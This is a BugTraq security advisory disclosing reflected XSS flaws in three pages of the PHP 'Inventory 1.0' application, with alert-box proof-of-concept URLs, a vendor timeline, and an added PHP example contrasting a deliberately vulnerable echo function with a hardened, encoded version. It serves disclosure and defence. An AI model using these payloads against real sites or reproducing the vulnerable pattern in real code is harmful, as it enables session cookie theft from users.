BugTraq
Inventory 1.0 Multiple XSS Vulnerabilities
Oct 26 2012 01:28PM
Thomas Richards (g13net gmail com)
# Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities
# Date: 10/19/12
# Author: G13
# Twitter: @g13net
# Software Site: https://github.com/farevalod/inventory
# Version: 1.0
# Category: webapp (php)
# dc585
##### ToC #####
0x01 Description
0x02 XSS
0x03 Vendor Notification
##### 0x01 Description #####
PHP + SQL Inventory tracking system
##### 0x02 XSS #####
The Inventory application has multiple pages and parameters that are
vulnerable to reflected cross-site scripting. These vulnerabilities could
be used to steal session cookies or take control of a client's browser.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]
-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>
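The root cause in all three pages is the same: a GET parameter is written into the HTML response without validation or output encoding. The following is an added example (not code from the Inventory project, whose source is not reproduced in this advisory) showing the vulnerable pattern next to a hardened version. The function names, the "Invoice" label and the digits-only rule for fact_num are assumptions; the page and parameter names come from the advisory above.

```php
<?php
// Added example, not the project's own code. Shows the reflected-XSS
// pattern behind consulta_fact.php?fact_num=... and the two-step fix:
// validate input where the format is known, HTML-encode on output always.
declare(strict_types=1);

// Vulnerable pattern: the GET parameter is echoed straight into the body.
// With ?fact_num=<script>alert(1)</script> the browser runs the script.
function render_vulnerable(string $fact_num): string
{
    return "<p>Invoice: " . $fact_num . "</p>";
}

// Step 1: validate. An invoice number is assumed to be digits only, so
// anything else is rejected before it can reach the page at all.
function validate_fact_num(?string $raw): ?int
{
    if ($raw === null || !preg_match('/^\d{1,12}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Step 2: encode on output. ENT_QUOTES covers both quote styles so the
// value is also safe inside an attribute; ENT_SUBSTITUTE avoids returning
// an empty string on invalid UTF-8 (which would silently drop the value).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(?string $raw): string
{
    $num = validate_fact_num($raw);
    if ($num === null) {
        http_response_code(400);
        return "<p>Invalid invoice number.</p>";
    }
    // Encoding a validated integer is redundant, but keeping every output
    // path behind h() means a later change to the validator cannot reopen the bug.
    return "<p>Invoice: " . h((string) $num) . "</p>";
}

// Free-text parameters such as sn (newinventario.php) and ref
// (newtransact.php) cannot be reduced to a numeric format, so output
// encoding is the whole defence there.
function render_free_text(string $label, string $raw): string
{
    return "<p>" . h($label) . ": " . h($raw) . "</p>";
}

// Run with `php xss_fix.php` to compare both behaviours against the
// advisory's own probe strings.
if (PHP_SAPI === 'cli') {
    $probe = '<script>alert(1)</script>';
    echo "vulnerable: ", render_vulnerable($probe), PHP_EOL;
    echo "hardened:   ", render_hardened($probe), PHP_EOL;
    echo "hardened:   ", render_hardened('12345'), PHP_EOL;
    echo "free text:  ", render_free_text('SN', '<script>alert(100)</script>'), PHP_EOL;
}
```

The hardened output for the probe is the literal text `&lt;script&gt;alert(1)&lt;/script&gt;`, which the browser displays rather than executes. Because the advisory's stated impact is session cookie theft, the same fix should be paired with the `HttpOnly` flag on the session cookie (`session.cookie_httponly = 1` in php.ini or `ini_set()` before `session_start()`), so that even a missed reflection point cannot read `document.cookie`.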
##### 0x03 Vendor Notification #####
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure